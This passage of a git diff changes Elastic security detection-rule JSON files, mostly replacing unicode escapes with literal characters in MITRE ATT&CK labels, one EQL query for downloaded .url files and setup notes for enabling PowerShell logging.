c8c1545907c..f1ede348153 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_107.json +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_107.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
@@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd82e3d6-1346-4afd-8f22-38388bbf34cb_1.json b/packages/security_detection_engine/kibana/security_rule/cd82e3d6-1346-4afd-8f22-38388bbf34cb_1.json index c27f428ef54..ebfc04bbd3f 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd82e3d6-1346-4afd-8f22-38388bbf34cb_1.json +++ b/packages/security_detection_engine/kibana/security_rule/cd82e3d6-1346-4afd-8f22-38388bbf34cb_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Downloaded URL Files", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension == \"url\"\n and file.Ext.windows.zone_identifier \u003e 1 and not process.name : \"explorer.exe\"\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension == \"url\"\n and file.Ext.windows.zone_identifier > 1 and not process.name : \"explorer.exe\"\n", "related_integrations": [ { "package": "endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_102.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_102.json index 2a7c059b5a3..7cf281da39b 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_102.json 
@@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_103.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_103.json index 1e845277b6e..46682f2552b 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_104.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_104.json index ffff8c305a2..0ba0a8f90e0 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_105.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_105.json index c164276c048..7717b06a301 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_105.json 
@@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_206.json b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_206.json index cc4f1ed5282..30131f4b681 100644 --- a/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_206.json +++ b/packages/security_detection_engine/kibana/security_rule/cd89602e-9db0-48e3-9391-ae3bf241acd8_206.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_102.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_102.json index d6005bda1a1..5830a88e2fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_102.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_103.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_103.json index e32d125263f..15da5551c55 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_103.json 
@@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_104.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_104.json index 8fcb10162c2..07d88a0d4ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_104.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_105.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_105.json index 1072201f250..bcf336d9f62 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_105.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_106.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_106.json index e0e4c2ca683..8d648402e25 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_106.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_106.json 
@@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_207.json b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_207.json index 95047d36989..e6970b6ff30 100644 --- a/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_207.json +++ b/packages/security_detection_engine/kibana/security_rule/cdbebdc1-dc97-43c6-a538-f26a20c0a911_207.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_2.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_2.json index 336dcc00f23..7c2cec79a83 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_2.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_2.json 
@@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_3.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_3.json index 6ad1ba832fd..4f6ecf027b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_3.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_3.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_4.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_4.json index e87eb673081..75d7d624a2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_4.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_4.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_5.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_5.json index fbe15ab1784..d7f171f8600 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_5.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_5.json 
@@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_6.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_6.json index 17a3c91630f..a041b4180c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_6.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_6.json 
@@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_7.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_7.json index 015409bd0e4..d3aff5eb165 100644 --- a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_7.json +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_7.json 
@@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "cde1bafa-9f01-4f43-a872-605b678968b0", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_103.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_103.json index 74b635f2495..bc133c40199 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_103.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_104.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_104.json index c6cb87e4819..ceae7b4a545 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_104.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_105.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_105.json index c41554597ba..7982168ceb7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_105.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_106.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_106.json index a930e497a63..1e985240d2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_106.json 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_107.json b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_107.json index 3d23d2f0360..651124a0e1b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ce64d965-6cb0-466d-b74f-8d2c76f47f05_107.json 
@@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_102.json b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_102.json index 70b2336ae4d..7ccc6333a8d 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_102.json 
@@ -37,7 +37,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_103.json b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_103.json index 490da43ce68..35e4a415419 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_103.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_104.json b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_104.json index edc2ee271b4..cf339347357 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_104.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_105.json b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_105.json index b0f66ee08eb..eb85caee5a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/cf53f532-9cc9-445a-9ae7-fced307ec53c_105.json 
